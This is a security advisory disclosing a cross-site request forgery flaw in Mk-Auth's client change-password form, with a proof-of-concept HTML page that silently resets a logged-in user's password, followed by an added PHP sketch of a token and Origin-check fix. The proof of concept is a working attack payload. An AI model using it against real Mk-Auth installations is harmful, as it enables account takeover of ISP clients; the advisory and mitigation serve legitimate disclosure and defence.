Created
January 3, 2021 19:40
Mk-Auth CSRF in Clients Change Password Form
Product Description:
Mk-Auth is a Brazilian management system for Internet Service Providers, used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to change a user’s password by enticing a logged-in user to access a malicious webpage.
Additional Information:
A malicious actor may craft a web page such that, when a user who is authenticated on Mk-Auth (in the “central” module) accesses it, the user’s password is automatically replaced by one chosen by the attacker.
PoC:
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://mkserver/central/executar_central.php?acao=altsenha_princ" method="POST">
      <input type="hidden" name="senha" value="123qwe" />
      <input type="hidden" name="senha2" value="123qwe" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Vulnerability Type:
CWE-352: Cross-Site Request Forgery (CSRF)
Vendor:
Mk-Auth
Affected Product:
MK-Auth 19.01 :: K4.9
Previous versions are probably also affected
Affected Component:
Central: Dados: Trocar Senha
Attack Vector:
Remote
Code Execution:
No
Attack Vector:
An authenticated user must access a malicious web page.
Reference:
http://mk-auth.com.br/
Discoverer:
Alan Lacerda (alacerda) | alacerda[at]intruderlabs.com.br
Filipe Cordeiro (sknux) | c_sfilipe[at]outlook.com
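Mitigation sketch (an added example, not part of the original advisory and not Mk-Auth's code): the PoC request carries only senha and senha2, so a handler that also requires a per-session token and checks the Origin header rejects it. The names csrf_token, TRUSTED_ORIGIN, csrf_issue_token and check_password_change are hypothetical, as are the sample requests.

```php
<?php
declare(strict_types=1);
// Added example, not Mk-Auth code. senha/senha2 come from the PoC above;
// csrf_token and TRUSTED_ORIGIN are hypothetical names.
const TRUSTED_ORIGIN = 'http://mkserver'; // assumption: the panel's own origin

/** Issue (or reuse) the per-session token to embed in the change-password form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Return null if the request may proceed, otherwise the reason it is rejected. */
function check_password_change(array $post, array $server, array $session): ?string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'method';
    }
    // A cross-site form POST carries the other page's Origin; accept only our own.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== TRUSTED_ORIGIN) {
        return 'origin';
    }
    // A forged form cannot read the victim's session, so it cannot supply the token.
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 'token';
    }
    if (($post['senha'] ?? '') === '' || $post['senha'] !== ($post['senha2'] ?? null)) {
        return 'mismatch';
    }
    return null;
}

// Constructed requests: the PoC's forged POST, then a legitimate one.
$session = [];
$token = csrf_issue_token($session);
$forged = ['senha' => '123qwe', 'senha2' => '123qwe'];
$legit = ['senha' => 'N3w-pass', 'senha2' => 'N3w-pass', 'csrf_token' => $token];
$cross = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'];
var_dump(check_password_change($forged, $cross, $session));
var_dump(check_password_change($legit, ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => TRUSTED_ORIGIN], $session));
```

In a real handler the three arrays would be $_POST, $_SERVER and $_SESSION after session_start(). Setting the session cookie's SameSite attribute to Lax or Strict adds a browser-enforced layer on top of the token check.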